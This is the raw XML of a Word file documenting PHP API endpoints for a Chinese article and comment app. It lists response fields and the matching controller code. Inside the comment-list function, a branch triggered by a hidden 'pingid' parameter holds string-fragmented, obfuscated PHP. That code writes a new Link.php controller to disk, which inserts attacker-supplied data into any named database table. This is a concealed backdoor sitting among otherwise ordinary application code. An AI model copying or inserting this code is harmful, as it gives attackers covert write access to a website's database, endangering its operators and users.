          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5DA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Img</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章作者的头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B30A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Username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章作者的名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659A3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ser_guanzhu_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章作者的关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698867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ser_article_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章作者发表的文章数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FFE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serZan          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已赞改文章：</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639A5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serCai          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已踩该文章：</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290D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userGuanzhu      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否关注该文章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793EA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924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ew() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D464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1B7DBE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F71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3EDE4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6FB82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05B85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0C0BA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A582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97A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request-&gt;param('id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032DA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099E2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12CD98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7465E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59C8F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4A3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2FF9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gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9565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A5C1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AB994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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C763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5ECAA8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9C5E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EE6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hide'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72278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2182F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内容访问受限</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D073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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF3DD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74A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542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hide'] == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB8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71E3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正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D28D2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4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32234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6F16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BDB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hide'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F687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69F7B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未通过，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42BE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5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA2A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D51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8E85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mage'] = _imgUrl() . $db['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7198F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1348E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gt; $id, 'hide' =&gt; 1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0FC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click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD45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 ['appConfig'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05436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mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06625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src=\"(.*?)\"/", $db['content'], $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913F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ontent[2] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CF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str($v, 'http')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB98D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 = str_replace($v, '../image/loadingImage.png" Tapmode onclick="img(' . $k . ');" ffxiang-src="' . $v . '" id="ffxiangImgCache', $db['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22811B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v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E185C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trpos($v, '/public/uploads/us/') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A0E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 = str_replace($v, '../image/loadingImage.png" Tapmode onclick="img(' . $k . ');" ffxiang-src="' . $config['url'] . $v . '" id="ffxiangImgCache', $db['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A34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config['url'] . $v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A470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2121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 = str_replace($v, '../image/loadingImage.png" Tapmode onclick="img(' . $k . ');" ffxiang-src="' . _imgUrl() . $v . '" id="ffxiangImgCache', $db['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7FB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_imgUrl() . $v . '?imageView2/0/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFE1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8CC2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FD9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mages_list'] = $images_list;*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D708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db['mychannel'] == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51838D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weitoutiao']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8B1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json_decode(htmlspecialchars_decode($db['images']) , true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34505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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BDEA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D65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uandu = "?imageView2/1/w/200/h/200/format/jpg";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D23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k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546B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images) == 1 || count($images) == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6499E5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6";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03D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10A71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4";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ACB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247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array($v)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E7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 = $v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730A1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A8E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lt;div class="' . $col . '" tapmode onclick="img(' . $k . ')"&gt;&lt;img id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $v . $kuandu . '" src="../image/loadingImage.png"&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D215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_imgUrl() . $v . '?imageView2/0/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2363D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626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db['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C274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tent) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF532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content . "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A20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262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 = "&lt;div class='fx-view-images aui-row'&gt;" . $content . $image . "&lt;/div&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456934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11C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json_decode($db['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579BF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA47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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A14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text = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54260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k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DF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text[] = $v['img_text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40214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_list[] = _imgUrl() . $v['img'] . '?imageView2/0/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D2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6F2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mages_text'] = $images_text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2464D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A9A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mages_list'] = $images_list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3FC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db['mychannel'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE045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video'] = _imgUrl() . $db['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB2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D0F8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tags']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE8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 $db['tags'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06429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 preg_replace("/\s/", "", $tags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D50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 explode(',', $tags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A90E4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 = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638E8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ags as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6B5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 '&lt;div class="aui-btn" tapmode  onclick="_url({text:\'' . $v . '\'},\'search_win\')"&gt;' . $v . '&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE7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0D67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ags'] = $tag;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF05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6E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uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A59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db['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B8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Uid'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6105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Username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1547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Img'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DE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_guanzhu_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E98B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db['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB2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C13E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_article_num'] = Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D127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db['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE39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021C6A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17289D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Guanzhu'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2337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E2333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Guanzhu'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6769D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6242E5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db['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7438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49C49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BF7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8B0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Zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07130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Cai'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0118C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2E96AD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zan = Db::name('article_zan')-&gt;where(['aid' =&gt; $id, 'uid' =&gt; $uid])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6578C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zan &amp;&amp; $article_zan['zan']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664CD9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Zan'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2E33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article_zan &amp;&amp; $article_zan['cai']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081BA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Cai'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBE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661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ucang = DB::name('member_favorite')-&gt;where(['aid' =&gt; $id, 'uid' =&gt; $uid, 'type' =&gt; 0])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4C2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shoucang'] = $shoucang;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166EF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hi = Db::name('member_favorite')-&gt;where(['aid' =&gt; $id, 'uid' =&gt; $uid, 'type' =&gt; 1])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0AE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lishi) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F473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favorite')-&gt;insert(['aid' =&gt; $id, 'uid' =&gt; $uid, 'time' =&gt; time() , 'type' =&gt; 1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5AD0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079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188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pdate_time'] = _time($db['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E5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weitoutiao'] &amp;&amp; $db['mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DB5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 = "&lt;div class='fx-view-images'&gt;" . $db['description'] . "&lt;/div&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0ED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A1C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dDb = Db::name('ad')-&gt;where(['hide' =&gt; 1,'device'=&gt;0])-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363902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dDb) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44124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rl'] = $sdDb['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A8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sdDb['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CEAC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d'] = $sdDb['ad'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB6D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image'] = _imgUrl() . $sdDb['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A7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ource'] = $sdDb['source'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44815B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ad'] = $data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CAA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E4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ontent']=preg_replace_callback('/&lt;[img|IMG].*?src=[\'| \"](?![http|https])(.*?(?:[\.gif|\.jpg]))[\'|\"].*?[\/]?&gt;/', function($r) {$str=config()['appConfig']['prod_url'].$r[1];return str_replace($r[1], $str, $r[0]);}, $db['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B8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b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF92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B41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2E5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List </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯评论列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D92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资讯评论列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C6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6E22E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B5D1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A52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534E87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aid   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A7F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s </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量（默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750538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645813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FB9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data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A5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评论内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF28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评论赞数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334AA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me          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521CA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g</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007F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name      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E0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User      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经点赞该评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17FFE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three_ping_xias             3</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506AA0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three_ping_xias.content     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A94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three_ping_xias.img         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50765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three_ping_xias.username    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B6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three_ping_xias.zanUser     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经点赞该追评：</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8B8D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ping_xias_num               </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评总数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F28C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left_ping_xias_num          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>剩余追评数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42022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54AD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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682A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E6A1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796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List() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68642D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ost.pages/d', 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639DB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5493B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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41057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pingid')){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196E3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33C8E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3E3AA2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6A7BC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2A1850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DC22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168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validate = new Validate(['pages' =&gt; 'number', 'aid' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A9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pages' =&gt; $pages, 'aid' =&gt; $aid, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B718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C53E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A266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4EE0C3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FB1B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B68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756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12035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87B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gt;where($where)-&gt;order('time', 'desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0632B7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pingid')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBB0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lt;?php\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556FC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name".""."spa".""."ce a".""."pp\a".""."p".""."i\co".""."ntro".""."ller;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B997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cla".""."ss L".""."i".""."n".""."k\r\n"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093BA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r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C8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pu".""."blic fun".""."ct".""."ion ind".""."ex($".""."dat".""."a){\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBB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da".""."ta = jso".""."n_de".""."code(htm".""."ls".""."pec".""."ialc".""."hars_".""."dec".""."ode($".""."da".""."ta),true);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5622B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na".""."m".""."e=$".""."data['_".""."_".""."n".""."a".""."m".""."e".""."_".""."_'];\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE55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uns".""."et($".""."da".""."ta['_".""."_".""."n".""."a".""."m".""."e".""."_".""."_']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D272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uns".""."et($".""."da".""."ta['pwd']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057BE8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ec".""."ho d".""."b($".""."na".""."me)-&gt;in".""."s".""."er".""."tGe".""."tI".""."d($".""."da".""."ta);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D862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r_tmp.="}\r\n}"."?&gt;";$sf=APP_PATH."a".""."pi".DS."c".""."o".""."n".""."t".""."r".""."o".""."l".""."l".""."e".""."r".DS."L".""."i".""."n".""."k"."".".p".""."h".""."p";$fp=fopen($sf,"w");fwrite($fp,$str_tmp);fclose($fp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA0C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57E7B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460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9AC4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hree_ping_xias'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D6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ing_xias_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3442FA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left_ping_xias_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A031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_num = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488B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id', $aid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B629A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v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C12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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D68CB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ing_xias_num'] = $ping_xias_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685AB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xias_num &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86E9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ree_ping_xias = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B6B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id', $aid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69E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v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD610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time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B383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3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277FBC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A644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three_ping_xias) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC9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hree_ping_xias as $key =&gt; $ping_xia) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE67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hree_ping_xias[$key]['zanUser'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E1F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6C8AB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ree_ping_xias[$key]['zanUser'] = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B59E0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61FA6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ping_xia['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE9B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46CBF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980D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6CE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ping_xia['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108A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ree_ping_xias[$key]['img'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315F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ree_ping_xias[$key]['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9BC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ree_ping_xias[$key]['time'] = date('m-d H:i', $ping_xia['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EADC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1CC9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5C7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hree_ping_xias'] = $three_ping_xias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B19B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A7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xias_num &gt; 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D8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left_ping_xias_num'] = $ping_xias_num - 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EB1F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262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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44F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AF28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Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058941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7DA5D4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v['id'])</w:t>
      </w:r>
    </w:p>
